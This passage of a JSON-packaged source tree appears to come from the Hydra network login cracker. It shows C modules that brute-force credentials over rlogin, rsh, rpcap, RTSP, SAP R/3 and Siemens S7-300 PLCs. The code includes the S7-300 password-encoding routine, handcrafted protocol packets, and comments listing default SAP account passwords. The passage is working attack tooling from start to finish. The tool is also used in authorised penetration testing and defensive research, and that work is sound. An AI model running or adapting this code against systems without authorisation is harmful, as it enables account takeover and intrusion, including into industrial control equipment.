((strstr(buffer, \"ailure\") == NULL) && (strstr(buffer, \"ncorrect\") == NULL) && (strstr(buffer, \"denied\") == NULL)) {\n#endif\n hydra_report_found_host(port, ip, \"rlogin\", fp);\n hydra_completed_pair_found();\n } else {\n hydra_completed_pair();\n }\n } else {\n /* if password is asked a second time, it means the pass we provided is\n * wrong */\n hydra_completed_pair();\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_rlogin(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_RLOGIN, mysslport = PORT_RLOGIN_SSL;\n\n hydra_register_socket(sp);\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n /* 512 -> 1023 */\n hydra_set_srcport(1023);\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_rlogin(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_rlogin_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-rpcap.c", "content": "// rpcap\n// Petar Kaleychev\n\n#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\nchar *buf;\n\nint32_t start_rpcap(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[1024];\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n char bfr1[] = \"\\x00\";\n char bfr2[] = \"\\x08\";\n char bfr3[] = \"\\x00\\x00\\x00\\x00\\x00\";\n char bfr4[] = \" \";\n bfr4[0] = strlen(login) + strlen(pass) + 8;\n char bfr5[] = \"\\x00\";\n char bfr6[] = \"\\x01\"; // x01 - when a password is required, x00 - when no need\n // of password\n char bfr7[] = \"\\x00\\x00\\x00\";\n char bfr8[] = \" \";\n bfr8[0] = strlen(login);\n char bfr9[] = \"\\x00\";\n char bfr10[] = \" \";\n bfr10[0] = strlen(pass);\n\n memset(buffer, 0, sizeof(buffer));\n memcpy(buffer, bfr1, 1);\n memcpy(buffer + 1, bfr2, 1);\n memcpy(buffer + 2, bfr3, 5);\n memcpy(buffer + 7, bfr4, 1);\n memcpy(buffer + 8, bfr5, 1);\n memcpy(buffer + 9, bfr6, 1);\n memcpy(buffer + 10, bfr7, 3);\n memcpy(buffer + 13, bfr8, 1);\n memcpy(buffer + 14, bfr9, 1);\n memcpy(buffer + 15, bfr10, 1);\n memcpy(buffer + 16, login, strlen(login));\n memcpy(buffer + 16 + strlen(login), pass, strlen(pass));\n\n if (hydra_send(s, buffer, 16 + strlen(login) + strlen(pass), 0) < 0) {\n return 1;\n }\n\n buf = hydra_receive_line(s);\n\n if (buf[1] == '\\x88') {\n hydra_report_found_host(port, ip, \"rpcap\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n /*\n if (strstr(buf, \"Logon failure\") == NULL) {\n hydra_report(stderr, \"[ERROR] rpcap error or service shutdown: %s\\n\",\n buf); free(buf); return 4;\n }\n */\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_rpcap(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_RPCAP, mysslport = PORT_RPCAP_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleep(300000);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_rpcap(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n break;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_rpcap_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, performed once only.\n // return codes:\n // 0 - rpcap with authentication\n // 1 - rpcap error or no need of authentication\n\n int32_t sock = -1;\n int32_t myport = PORT_RPCAP, mysslport = PORT_RPCAP_SSL;\n char buffer[] = \"\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n hydra_register_socket(sp);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Can not connect to port %d on the target\\n\", myport);\n hydra_child_exit(1);\n }\n\n if (hydra_send(sock, buffer, 16, 0) < 0) {\n return 1;\n }\n\n buf = hydra_receive_line(sock);\n\n if (strstr(buf, \"NULL authentication not permitted\") == NULL) {\n hydra_report(stderr, \"[!] rpcap error or no need of authentication!\\n\");\n free(buf);\n return 1;\n }\n\n free(buf);\n sock = hydra_disconnect(sock);\n return 0;\n}\n" }, { "path": "hydra-rsh.c", "content": "#include \"hydra-mod.h\"\n#define COMMAND \"/bin/ls /\"\n\n/*\n\npassword is not used here, just try to find rsh accounts\nyou should use -p ''\n\nno memleaks found on 110425\n\n*/\n\nextern char *HYDRA_EXIT;\n\nint32_t start_rsh(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, buffer[300] = \"\", buffer2[100], *bptr = buffer2;\n int32_t ret;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n\n memset(buffer2, 0, sizeof(buffer2));\n bptr++;\n\n strcpy(bptr, login);\n bptr += 1 + strlen(login);\n\n strcpy(bptr, login);\n bptr += 1 + strlen(login);\n\n strcpy(bptr, COMMAND);\n\n if (hydra_send(s, buffer2, 4 + strlen(login) + strlen(login) + strlen(COMMAND), 0) < 0) {\n return 4;\n }\n\n buffer[0] = 0;\n if ((ret = hydra_recv(s, buffer, sizeof(buffer) - 1)) > 0)\n buffer[ret] = 0;\n else /* 0x00 is sent but hydra_recv transformed it */\n if ((ret = hydra_recv(s, buffer, sizeof(buffer) - 1)) > 0)\n buffer[ret] = 0;\n#ifdef HAVE_PCRE\n if (ret > 0 && (!hydra_string_match(buffer, \"\\\\s(failure|incorrect|denied)\"))) {\n#else\n if (ret > 0 && (strstr(buffer, \"ailure\") == NULL) && (strstr(buffer, \"ncorrect\") == NULL) && (strstr(buffer, \"denied\") == NULL)) {\n#endif\n hydra_report_found_host(port, ip, \"rsh\", fp);\n hydra_completed_pair_found();\n } else {\n hydra_completed_pair();\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_rsh(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_RSH, mysslport = PORT_RSH_SSL;\n\n hydra_register_socket(sp);\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n hydra_set_srcport(1023);\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_rsh(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_rsh_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-rtsp.c", "content": "//\n// hydra-rtsp.c\n// hydra-rtsp\n//\n// Created by Javier Sánchez on 18/04/15.\n//\n//\n\n#ifndef _GNU_SOURCE\n#define _GNU_SOURCE\n#endif\n\n#include \"hydra-mod.h\"\n#include \"sasl.h\"\n#include \n#include \n\nextern char *HYDRA_EXIT;\nchar packet[500];\nchar packet2[500];\n\nint32_t is_Unauthorized(char *s) {\n if (strcasestr(s, \"401 Unauthorized\") != NULL) {\n return 1;\n } else {\n return 0;\n }\n}\n\nint32_t is_NotFound(char *s) {\n if (strcasestr(s, \"404 Stream\") != NULL || strcasestr(s, \"404 Not\") != NULL) {\n return 1;\n } else {\n return 0;\n }\n}\n\nint32_t is_Authorized(char *s) {\n if (strcasestr(s, \"200 OK\") != NULL) {\n return 1;\n } else {\n return 0;\n }\n}\n\nint32_t use_Basic_Auth(char *s) {\n if (strcasestr(s, \"WWW-Authenticate: Basic\") != NULL) {\n return 1;\n } else {\n return 0;\n }\n}\n\nint32_t use_Digest_Auth(char *s) {\n if (strcasestr(s, \"WWW-Authenticate: Digest\") != NULL) {\n return 1;\n } else {\n return 0;\n }\n}\n\nvoid create_core_packet(int32_t control, char *ip, int32_t port) {\n char *target = hydra_address2string(ip);\n\n if (control == 0) {\n if (strlen(packet) <= 0) {\n sprintf(packet, \"DESCRIBE rtsp://%.260s:%i RTSP/1.0\\r\\nCSeq: 2\\r\\n\\r\\n\", target, port);\n }\n } else {\n if (strlen(packet2) <= 0) {\n sprintf(packet2, \"DESCRIBE rtsp://%.260s:%i RTSP/1.0\\r\\nCSeq: 3\\r\\n\", target, port);\n }\n }\n}\nint32_t start_rtsp(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[1030], buffer2[500];\n char *lresp;\n\n memset(buffer, 0, sizeof(buffer));\n memset(buffer2, 0, sizeof(buffer2));\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n create_core_packet(0, ip, port);\n\n if (hydra_send(s, packet, strlen(packet), 0) < 0) {\n return 1;\n }\n lresp = hydra_receive_line(s);\n\n if (lresp == NULL) {\n hydra_report(stderr, \"[ERROR] no server reply\\n\");\n return 1;\n }\n\n if (is_NotFound(lresp)) {\n free(lresp);\n hydra_report(stderr, \"[INFO] Server does not need credentials\\n\");\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n return 3;\n }\n return 1;\n } else {\n create_core_packet(1, ip, port);\n\n if (use_Digest_Auth(lresp) == 1) {\n char aux[500] = \"\", dbuf[500] = \"\", *result = NULL;\n char *pbuffer = hydra_strcasestr(lresp, \"WWW-Authenticate: Digest \");\n\n strncpy(aux, pbuffer + strlen(\"WWW-Authenticate: Digest \"), sizeof(aux));\n aux[sizeof(aux) - 1] = '\\0';\n free(lresp);\n#ifdef LIBOPENSSL\n result = sasl_digest_md5(dbuf, login, pass, aux, miscptr, \"rtsp\", hydra_address2string(ip), port, \"\");\n#else\n hydra_report(stderr, \"[ERROR] Digest auth required but compiled \"\n \"without OpenSSL/MD5 support\\n\");\n return 3;\n#endif\n if (result == NULL) {\n hydra_report(stderr, \"[ERROR] digest generation failed\\n\");\n return 3;\n }\n sprintf(buffer, \"%.500sAuthorization: Digest %.500s\\r\\n\\r\\n\", packet2, dbuf);\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer);\n } else if (use_Basic_Auth(lresp) == 1) {\n free(lresp);\n sprintf(buffer2, \"%.249s:%.249s\", login, pass);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%.500sAuthorization: : Basic %.500s\\r\\n\\r\\n\", packet2, buffer2);\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer);\n } else {\n hydra_report(stderr, \"[ERROR] unknown authentication protocol\\n\");\n return 1;\n }\n\n if (strlen(buffer) == 0) {\n hydra_report(stderr, \"[ERROR] could not identify HTTP authentication used\\n\");\n return 1;\n }\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n\n lresp = NULL;\n lresp = hydra_receive_line(s);\n\n if (lresp == NULL) {\n hydra_report(stderr, \"[ERROR] no server reply\\n\");\n return 1;\n }\n\n if (is_NotFound(lresp) || is_Authorized(lresp)) {\n free(lresp);\n hydra_completed_pair_found();\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n return 3;\n }\n return 1;\n }\n free(lresp);\n hydra_completed_pair();\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n // not rechead\n return 2;\n}\n\nvoid service_rtsp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_RTSP /*, mysslport = PORT_RTSP_SSL*/;\n\n hydra_register_socket(sp);\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0) {\n sock = hydra_disconnect(sock);\n }\n if ((options & OPTION_SSL) == 0) {\n if (port != 0) {\n myport = port;\n }\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_rtsp(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0) {\n sock = hydra_disconnect(sock);\n }\n hydra_child_exit(0);\n break;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_rtsp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n return 0;\n}\n" }, { "path": "hydra-s7-300.c", "content": "// submitted by Alexander Timorin and Sergey\n// Gordeychik\n\n#include \"hydra-mod.h\"\n\n#define S7PASSLEN 8\n\nextern char *HYDRA_EXIT;\n\nunsigned char p_cotp[] = \"\\x03\\x00\\x00\\x16\\x11\\xe0\\x00\\x00\\x00\\x17\"\n \"\\x00\\xc1\\x02\\x01\\x00\\xc2\\x02\\x01\\x02\\xc0\"\n \"\\x01\\x0a\";\n\nunsigned char p_s7_negotiate_pdu[] = \"\\x03\\x00\\x00\\x19\\x02\\xf0\\x80\\x32\\x01\\x00\"\n \"\\x00\\x02\\x00\\x00\\x08\\x00\\x00\\xf0\\x00\\x00\"\n \"\\x01\\x00\\x01\\x01\\xe0\";\n\nunsigned char p_s7_read_szl[] = \"\\x03\\x00\\x00\\x21\\x02\\xf0\\x80\\x32\\x07\\x00\"\n \"\\x00\\x03\\x00\\x00\\x08\\x00\\x08\\x00\\x01\\x12\"\n \"\\x04\\x11\\x44\\x01\\x00\\xff\\x09\\x00\\x04\\x01\"\n \"\\x32\\x00\\x04\";\n\nunsigned char p_s7_password_request[] = \"\\x03\\x00\\x00\\x25\\x02\\xf0\\x80\\x32\\x07\\x00\"\n \"\\x00\\x00\\x00\\x00\\x08\\x00\\x0c\\x00\\x01\\x12\"\n \"\\x04\\x11\\x45\\x01\\x00\\xff\\x09\\x00\\x08\";\n\nint32_t start_s7_300(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *pass, buffer[1024];\n char context[S7PASSLEN + 1];\n unsigned char encoded_password[S7PASSLEN];\n char *spaces = \" \";\n int32_t ret = -1;\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n // prepare password\n memset(context, 0, sizeof(context));\n if (strlen(pass) < S7PASSLEN) {\n strncpy(context, pass, strlen(pass));\n strncat(context, spaces, S7PASSLEN - strlen(pass));\n } else {\n strncpy(context, pass, S7PASSLEN);\n }\n\n // encode password\n encoded_password[0] = context[0] ^ 0x55;\n encoded_password[1] = context[1] ^ 0x55;\n int32_t i;\n\n for (i = 2; i < S7PASSLEN; i++) {\n encoded_password[i] = context[i] ^ encoded_password[i - 2] ^ 0x55;\n }\n\n // send p_cotp and check first 2 bytes of answer\n if (hydra_send(s, (char *)p_cotp, 22, 0) < 0)\n return 1;\n memset(buffer, 0, sizeof(buffer));\n ret = hydra_recv_nb(s, buffer, sizeof(buffer));\n\n if (ret <= 0)\n return 3;\n\n if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00))\n return 3;\n\n // send p_s7_negotiate_pdu and check first 2 bytes of answer\n if (hydra_send(s, (char *)p_s7_negotiate_pdu, 25, 0) < 0)\n return 1;\n memset(buffer, 0, sizeof(buffer));\n ret = hydra_recv_nb(s, buffer, sizeof(buffer));\n\n if (ret <= 0)\n return 3;\n\n if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00))\n return 3;\n\n // send p_s7_read_szl and check first 2 bytes of answer\n if (hydra_send(s, (char *)p_s7_read_szl, 33, 0) < 0)\n return 1;\n memset(buffer, 0, sizeof(buffer));\n ret = hydra_recv_nb(s, buffer, sizeof(buffer));\n\n if (ret <= 0)\n return 3;\n\n if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00))\n return 3;\n\n // so now add encoded_password to p_s7_password_request and send\n memset(buffer, 0, sizeof(buffer));\n memcpy(buffer, p_s7_password_request, 29);\n memcpy(buffer + 29, encoded_password, S7PASSLEN);\n\n if (hydra_send(s, buffer, 29 + S7PASSLEN, 0) < 0)\n return 1;\n\n memset(buffer, 0, sizeof(buffer));\n ret = hydra_recv_nb(s, buffer, sizeof(buffer));\n\n if (ret <= 0)\n return 3;\n\n // now check answer\n // 0x0000 - valid password\n // 0xd605 - no password\n // 0xd602 - wrong password\n if (ret > 30) {\n if (buffer[27] == '\\x00' && buffer[28] == '\\x00') {\n hydra_report_found_host(port, ip, \"s7-300\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n }\n\n if (buffer[27] == '\\xd6' && buffer[28] == '\\x05') {\n // hydra_report_found_host(port, ip, \"s7-300\", fp);\n hydra_completed_pair_found();\n hydra_report(stderr, \"[INFO] No password protection enabled\\n\");\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n }\n }\n\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n\n return 1;\n}\n\nvoid service_s7_300(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t s7port = PORT_S7_300;\n\n if (port != 0)\n s7port = port;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n sock = hydra_connect_tcp(ip, s7port);\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = start_s7_300(sock, ip, s7port, options, miscptr, fp);\n sock = hydra_disconnect(sock);\n break;\n case 2: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_s7_300_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // 1 skip target without generating an error\n // 2 skip target because of protocol problems\n // 3 skip target because its unreachable\n int32_t sock = -1;\n int32_t s7port = PORT_S7_300;\n char *empty = \"\";\n char *pass, buffer[1024];\n char context[S7PASSLEN + 1];\n unsigned char encoded_password[S7PASSLEN];\n char *spaces = \" \";\n int32_t ret = -1;\n int32_t i;\n\n if (port != 0)\n s7port = port;\n\n if (debug || verbose)\n printf(\"[INFO] Checking authentication setup...\\n\");\n\n sock = hydra_connect_tcp(ip, s7port);\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Can not connect to port %d on the target\\n\", s7port);\n return 2;\n }\n\n pass = empty;\n\n // prepare password\n memset(context, 0, sizeof(context));\n strncat(context, spaces, S7PASSLEN - strlen(pass));\n\n // encode password\n encoded_password[0] = context[0] ^ 0x55;\n encoded_password[1] = context[1] ^ 0x55;\n for (i = 2; i < S7PASSLEN; i++) {\n encoded_password[i] = context[i] ^ encoded_password[i - 2] ^ 0x55;\n }\n\n // send p_cotp and check first 2 bytes of answer\n if (hydra_send(sock, (char *)p_cotp, 22, 0) < 0) {\n fprintf(stderr, \"[ERROR] can not send data to service\\n\");\n return 3;\n }\n memset(buffer, 0, sizeof(buffer));\n if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {\n fprintf(stderr, \"[ERROR] did not received data from the service\\n\");\n return 3;\n }\n\n if (ret < 2 || (buffer[0] != 0x03 && buffer[1] != 0x00)) {\n fprintf(stderr, \"[ERROR] invalid reply to init packet\\n\");\n return 3;\n }\n // send p_s7_negotiate_pdu and check first 2 bytes of answer\n if (hydra_send(sock, (char *)p_s7_negotiate_pdu, 25, 0) < 0) {\n fprintf(stderr, \"[ERROR] can not send data to service (2)\\n\");\n return 3;\n }\n memset(buffer, 0, sizeof(buffer));\n if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {\n fprintf(stderr, \"[ERROR] did not received data from the service (2)\\n\");\n return 3;\n }\n\n if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00)) {\n fprintf(stderr, \"[ERROR] invalid reply to init packet (2)\\n\");\n return 3;\n }\n // send p_s7_read_szl and check first 2 bytes of answer\n if (hydra_send(sock, (char *)p_s7_read_szl, 33, 0) < 0) {\n fprintf(stderr, \"[ERROR] can not send data to service (3)\\n\");\n return 3;\n }\n memset(buffer, 0, sizeof(buffer));\n if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) >= 0) {\n fprintf(stderr, \"[ERROR] did not received data from the service (3)\\n\");\n return 3;\n }\n\n if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00)) {\n fprintf(stderr, \"[ERROR] invalid reply to init packet (3)\\n\");\n return 3;\n }\n // so now add encoded_password to p_s7_password_request and send\n memset(buffer, 0, sizeof(buffer));\n memcpy(buffer, p_s7_password_request, 29);\n memcpy(buffer + 29, encoded_password, S7PASSLEN);\n\n if (hydra_send(sock, buffer, 29 + S7PASSLEN, 0) < 0) {\n fprintf(stderr, \"[ERROR] can not send data to service (4)\\n\");\n return 3;\n }\n\n memset(buffer, 0, sizeof(buffer));\n if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {\n fprintf(stderr, \"[ERROR] did not received data from the service (4)\\n\");\n return 3;\n }\n // now check answer\n // 0x0000 - valid password\n // 0xd605 - no password\n // 0xd602 - wrong password\n if (ret > 30) {\n if ((buffer[27] == '\\x00' && buffer[28] == '\\x00') || (buffer[27] == '\\xd6' && buffer[28] == '\\x05')) {\n hydra_report(stderr, \"[INFO] No password protection enabled, no password \"\n \"tests are necessary!\\n\");\n return 1;\n }\n }\n\n sock = hydra_disconnect(sock);\n\n return 0;\n}\n\nvoid usage_s7_300(const char *service) {\n printf(\"Module S7-300 is for a special Siemens PLC. It either requires only a \"\n \"password or no authentication, so just use the -p or -P option.\\n\\n\");\n}\n" }, { "path": "hydra-sapr3.c", "content": "#include \"hydra-mod.h\"\n// checked for memleaks on 110425, none found\n#ifndef LIBSAPR3\nvoid dummy_sapr3() { printf(\"\\n\"); }\n#else\n\n#include \n#include \n\n/* temporary workaround fix */\nconst int32_t *__ctype_tolower;\nconst int32_t *__ctype_toupper;\nconst int32_t *__ctype_b;\n\nextern void flood(); /* for -lm */\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\nRFC_ERROR_INFO_EX error_info;\n\nint32_t start_sapr3(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n RFC_HANDLE handle;\n char *empty = \"\";\n char *login, *pass, buffer[1024];\n char *buf;\n int32_t i;\n int32_t sysnr = port % 100;\n char opts[] = \"RFCINI=N RFCTRACE=N BALANCE=N DEBUG=N TRACE=0 ABAP_DEBUG=0\";\n\n // char opts[] = \"RFCINI=N RFCTRACE=Y BALANCE=N DEBUG=Y TRACE=Y\n // ABAP_DEBUG=Y\";\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n if (strlen(login) > 0)\n for (i = 0; i < strlen(login); i++)\n login[i] = (char)toupper(login[i]);\n if (strlen(pass) > 0)\n for (i = 0; i < strlen(pass); i++)\n pass[i] = (char)toupper(pass[i]);\n\n memset(buffer, 0, sizeof(buffer));\n memset(&error_info, 0, sizeof(error_info));\n\n // strcpy(buf, \"mvse001\");\n snprintf(buffer, sizeof(buffer), \"ASHOST=%s SYSNR=%02d CLIENT=%03d USER=\\\"%s\\\" PASSWD=\\\"%s\\\" LANG=DE %s\", hydra_address2string(ip), sysnr, atoi(miscptr), login, pass, opts);\n\n /*\n USER=SAPCPIC PASSWORD=admin\n USER=SAP* PASSWORD=PASS\n\n ## do we need these options?\n SAPSYS=3 SNC_MODE=N SAPGUI=N INVISIBLE=N GUIATOPEN=Y NRCALL=00001 CLOSE=N\n\n ASHOST= // IP\n SYSNR= // port - 3200, scale 2\n CLIENT= // miscptr, scale 2\n ABAP_DEBUG=0\n USER=\n PASSWD=\n LANG=DE\n */\n // printf (\"DEBUG: %d Connectstring \\\"%s\\\"\\n\",sizeof(error_info),buffer);\n handle = RfcOpenEx(buffer, &error_info);\n\n // printf(\"DEBUG: handle %d, key %s, message %s\\n\", handle, error_info.key,\n // error_info.message);\n\n if (handle <= RFC_HANDLE_NULL)\n return 3;\n\n if (strstr(error_info.message, \"sapgui\") != NULL || strlen(error_info.message) == 0) {\n hydra_report_found_host(port, ip, 